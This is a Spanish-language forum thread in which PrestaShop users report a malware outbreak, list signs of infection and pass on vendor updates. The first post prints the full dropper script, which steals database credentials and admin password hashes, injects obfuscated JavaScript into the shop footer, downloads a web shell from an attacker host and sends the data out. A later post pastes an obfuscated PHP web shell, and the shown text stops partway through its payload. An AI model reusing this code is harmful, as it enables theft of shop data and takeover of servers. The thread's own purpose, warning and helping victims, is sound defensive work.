Jump to content

Virus en Prestashop


jesusruiz

Recommended Posts

Abro este Hilo, para los posibles afectados del virus que deja practicamente inservible una tienda creada en Prestashop. Estan afectadas todas las versiones de Prestashop.

 

Al parecer los afectados indican, que aparece un nuevo archivo dentro de la carpeta modules, llamado her.php, que presenta el siguiente código:

<?php
error_reporting(0);
$shcode = "{literal}".base64_decode("PHNjcmlwdD5TdHJpbmcucHJvdG90eXBlLmFzZD1mdW5jdGlvbigpe3JldHVybiBTdHJpbmcuZnJvbUNoYXJDb2RlO307T2JqZWN0LnByb3RvdHlwZS5hc2Q9ImUiO3RyeXtmb3IoaSBpbnt9KWlmKH5pLmluZGV4T2YoJ2FzJykpdGhyb3cgMTt9Y2F0Y2gocSl7enhjPXt9W2ldO312PWRvY3VtZW50LmNyZWF0ZVRleHROb2RlKCdhc2QnKTt2YXIgcz0iIjtmb3IoaSBpbiB2KWlmKGk9PSdjaGlsZE5vZGVzJylvPXZbaV0ubGVuZ3RoKzE7byo9MjtlPWV2YWw7bT1bMTIwLW8sOTktbywxMTYtbywzNC1vLDEwMi1vLDM0LW8sNjMtbywzNC1vLDExMi1vLDEwMy1vLDEyMS1vLDM0LW8sNzAtbyw5OS1vLDExOC1vLDEwMy1vLDQyLW8sNDMtbyw2MS1vLDEyMC1vLDk5LW8sMTE2LW8sMzQtbywxMjItbyw2My1vLDg1LW8sMTE4LW8sMTE2LW8sMTA3LW8sMTEyLW8sMTA1LW8sNDgtbywxMDQtbywxMTYtbywxMTMtbywxMTEtbyw2OS1vLDEwNi1vLDk5LW8sMTE2LW8sNjktbywxMTMtbywxMDItbywxMDMtbyw0Mi1vLDc5LW8sOTktbywxMTgtbywxMDYtbyw0OC1vLDEwNC1vLDExMC1vLDExMy1vLDExMy1vLDExNi1vLDQyLW8sMTAyLW8sNDgtbywxMDUtbywxMDMtbywxMTgtbyw3MC1vLDk5LW8sMTE4LW8sMTAzLW8sNDItbyw0My1vLDQ5LW8sNTItbyw0My1vLDQ1LW8sNTktbyw1Ny1vLDQzLW8sNjEtbywzNC1vLDEyMC1vLDk5LW8sMTE2LW8sMzQtbywxMjMtbyw2My1vLDg1LW8sMTE4LW8sMTE2LW8sMTA3LW8sMTEyLW8sMTA1LW8sNDgtbywxMDQtbywxMTYtbywxMTMtbywxMTEtbyw2OS1vLDEwNi1vLDk5LW8sMTE2LW8sNjktbywxMTMtbywxMDItbywxMDMtbyw0Mi1vLDEwMi1vLDQ4LW8sMTA1LW8sMTAzLW8sMTE4LW8sNzQtbywxMTMtbywxMTktbywxMTYtbywxMTctbyw0Mi1vLDQzLW8sNDUtbyw1OS1vLDU3LW8sNDMtbyw2MS1vLDEwMi1vLDExMy1vLDEwMS1vLDExOS1vLDExMS1vLDEwMy1vLDExMi1vLDExOC1vLDQ4LW8sMTIxLW8sMTE2LW8sMTA3LW8sMTE4LW8sMTAzLW8sNDItbywzNi1vLDYyLW8sMTA3LW8sMTA0LW8sMTE2LW8sOTktbywxMTEtbywxMDMtbywzNC1vLDExNy1vLDExNi1vLDEwMS1vLDYzLW8sNDEtbywxMDYtbywxMTgtbywxMTgtbywxMTQtbyw2MC1vLDQ5LW8sNDktbywxMDEtbywxMTAtbywxMDctbywxMDEtbywxMDktbywxMTEtbywxMDMtbywzNi1vLDQ1LW8sMTIyLW8sNDUtbywxMjMtbyw0NS1vLDM2LW8sNDgtbywxMDQtbywxMDctbywxMTAtbywxMDMtbyw5OS1vLDEyMC1vLDEwMy1vLDQ4LW8sMTAxLW8sMTEzLW8sMTExLW8sNDEtbywzNC1vLDEyMS1vLDEwNy1vLDEwMi1vLDExOC1vLDEwNi1vLDYzLW8sNTAtbywzNC1vLDEwNi1vLDEwMy1vLDEwNy1vLDEwNS1vLDEwNi1vLDExOC1vLDYzLW8sNTAtbyw2NC1vLDM2LW8sNDMtbyw2MS1vXTttbT0nJy5hc2QoKTtmb3IoaT0wO2k8bS5sZW5ndGg7aSsrKXMrPW1tKGUoIm0iKyJbIisiaSIrIl0iKSk7ZShzKTs8L3NjcmlwdD4=")."{/literal}";
$shurl = "http://www.c2bill.it/stest/chkpnt/shell.txt";  
$msgurl = "http://www.c2bill.it/stest/chkpnt/sdata.php";
$mails = "[email protected], [email protected]";
function deletedir($arg){   $d=opendir($arg);  while($f=readdir($d)){     if($f!="."&&$f!=".."){        if(is_dir($arg."/".$f))        deletedir($arg."/".$f);       else         unlink($arg."/".$f);     }  }  rmdir($arg);closedir($d);}
@include("../config/settings.inc.php");
///Host info
$hostvar = "host:".$_SERVER["HTTP_HOST"]."\n"."ref:".$_SERVER["HTTP_REFERER"]."\n"."path:".$_SERVER["SCRIPT_FILENAME"]."\n=====\n";
///Server info
$srvvar =  _DB_SERVER_."\n"._DB_USER_."\n"._DB_PASSWD_."\n"._DB_NAME_."\n"._DB_PREFIX_."\n"._COOKIE_KEY_."\n"._COOKIE_IV_."\n"._PS_VERSION_."\n=====\n";
///GET admin
mysql_connect(_DB_SERVER_,_DB_USER_,_DB_PASSWD_);
mysql_selectdb(_DB_NAME_);
$r = mysql_query("SELECT `email`, `passwd` FROM `"._DB_PREFIX_."employee` WHERE id_profile = 1");
while($ro=mysql_fetch_assoc($r)){$usrs .= $ro['email'].":".$ro['passwd']."\n";}
//Wride sploit
@deletedir("../tools/smarty/compile/");
@deletedir("../tools/smarty/cache/"); 
@deletedir("../tools/smarty_v2/"); 
@deletedir("../tools/smarty_v2/"); 
$fn = "../themes/"._THEME_NAME_."/footer.tpl";
$f = fopen($fn,"r");$ff = fread($f,filesize($fn));fclose($f);
$ff = str_replace("</body>","                                     ".$shcode."</body>",$ff);
$f = fopen($fn,"w");$rf = fwrite($f,$ff);fclose($f); 
if($rf>0) $wrres = "true"; else $wrres = "false";
//write shell
$sh = file_get_contents($shurl);
$shf = "../upload/".md5(date("r")).".php"; 
$f = fopen($shf,"w");$rf = fwrite($f,$sh);fclose($f);
$shf2 = "../download/".md5(date("r")).".php"; 
$f = fopen($shf2,"w");$rf = fwrite($f,$sh);fclose($f);
@unlink("../download/.htaccess");
$msg = $hostvar.$srvvar.$usrs."=====\nTemplate writed:".$wrres."\n=====\nShells:\n".$shf."\n".$shf2."\n=====\n";
@mail($mails,"new shop",$msg);
@file_get_contents($msgurl."?data=".base64_encode($msg));
@unlink(__FILE__);
?>

 

También comentan que podría ser una vulnerabilidad que hay en el código del archivo footer.tpl, que aparece también modificado por el virus.

 

83257973az.jpg

 

Al parecer hay usuarios con distintos sintomas, pero practicamente todos indican que la tienda no deja hacer practicamente nada.

 

Hay usuarios afectados, incluso teniendo la tienda sólo en local.

 

Dejo una recopilación de cinco puntos que se han encontrado para detectar este virus/hack o lo que sea:

 

1) Una secuencia de comandos se añade al archivo footer.tpl en la carpeta del tema activo.

 

2) Un archivo PHP se crea tanto en la carpetas /upload y /download.

 

3) .Htaccess que se encuentra en la carpeta /download es eliminado.

 

4) Las carpetas Tools/smarty/compile, tools/smarty/cache y tools/smarty_v2 son eliminadas.

 

5) El archivo, her.php dentro de la carpeta /módulos, a veces no aparece. Este archivo es eliminado después del provocar el hack.

 

El antivirus AVAST detecta el virus, al entrar en la tienda:

sansre2db.jpg

 

Comentar que los responsables de Prestashop, han comentado que están preocupados y sorprendidos por la gravedad del asunto y que ha sido asignada esta vulnerabilidad como máxima prioridad a sus desarrolladores más calificados. Maxence y Mike entre ellos (máximos responsables de Prestashop), están trabajando en el asunto. Se está investigando para tratar de localizar la vulnerabilidad en el código de la tienda, incluso si esta vulnerabilidad se encuentra en un módulo externo.

 

Tan pronto cuando tengan alguna noticia que darnos, seremos informados.

 

Toda la info en inglés en: Virus en Prestashop

 

Mi tienda personalmente creo que no está afectada, al menos no noto nada raro y todo parece funcionar bien.

Es raro que de momento, los españoles nos estemos librando. Porque en los demás idiomas, hay afectados.

Link to comment
Share on other sites

pues una de mis tiendas en desarrollo, me ha aparecido, curiosamente, hacía semanas que no la tocaba ni le hacía nada.

Alguna idea para arreglarlo???

De momento no hay solución y no creo que la haya hasta dentro de unas horas o días.

 

Supongo que tendrán que averiguar de donde viene el fallo y no creo que eso sea fácil. Date cuenta que puede venir de cualquier sitio, desde el propio código de la tienda o a un módulo de terceras personas que tengamos instalado.

 

Aunque según comenta un usuario que acaba de instalar la tienda y que la acababa de descargar, ha sido infectada a las pocas horas y no había realizado ningún cambio.

 

Los que estéis afectados, indicad en el Hilo Oficial abierto en el foro inglés, la información que penseis que puede ser importante.

Esto es, archivos que tengais infectados o hayan sido borrados, versión de Prestashop que usais, si la tenéis online u en local, etc...

Link to comment
Share on other sites

Hola,

 

El equipo es consciente de este problema.

 

Estamos trabajando para resolverlo lo más rápido posible.

 

Le mantendremos informado de las noticias.

 

Puedo utilizar Google Translate, espero estar lo suficientemente claro ...

We understand everything you say, perfectly;)

 

I'll be posting in Spanish, the information to be given in the forums.

 

Thanks for writing.

  • Like 1
Link to comment
Share on other sites

Una de la tiendas que tengo está afectada. Aparentemente no se notaba pero podía ver al final de la página de inicio como un puntito. Al llegar a casa casualmente cogí el Ipad para mostrar una cosa a mi hija y al ver la tienda pulsé en la pantalla táctil sobre tal puntito y apareció un cajón largo del tamaño de un A4. Empecé a ver cosas raras.., el boton de +1 de google desapareció sin más, no podia mover cajas desde el modo live. Me dí cuenta que el footer.tpl estaba modificado y que en /upload había un fichero php desconocido. Creía que sólo me pasaba a mí pero esta mañana al meterme en el foro inglés he visto que es algo muy serio y que se ha distribuído con gran rapidez en muchas tiendas.

 

Tened cuidado !

 

Utilizo PS 1.4.1.0

 

Esperemos que se resuelva pronto.

Link to comment
Share on other sites

Carl Favre, acaba de informar lo siguiente:

 

Hola a todos,

 

Una buena noticia!

 

El problema se ha solucionado. No se extenderá más.

 

Para aquellos que han tenido este problema, pónganse en contacto con nosotros en: [email protected]

 

Por ahora estamos trabajando en una solución para que se pueda eliminar todos los archivos infectados.

 

Daremos más información un poco más tarde.

 

De todo el equipo, gracias otra vez por su cooperación y paciencia.

  • Like 2
Link to comment
Share on other sites

En mi caso creo que tambien me he visto afectado aunque no se hasta que punto, CREO y solo CREO que el problema se debe a la instalacion de un modulo de terceros (no dire el nombre) que permite instalar pero no desinstalar el modulo (version 1.4.4 ONLINE); creando un codigo en footer.tpl entre otros ademas de subir un archivo a la carpeta /uploads/ con numeros y con extension .php cuyo codigo es:

 

 

<?php 
if (isset($_GET['session2'])){
$auth_pass = "fa816edb83e95bf0c8da580bdfd491ef";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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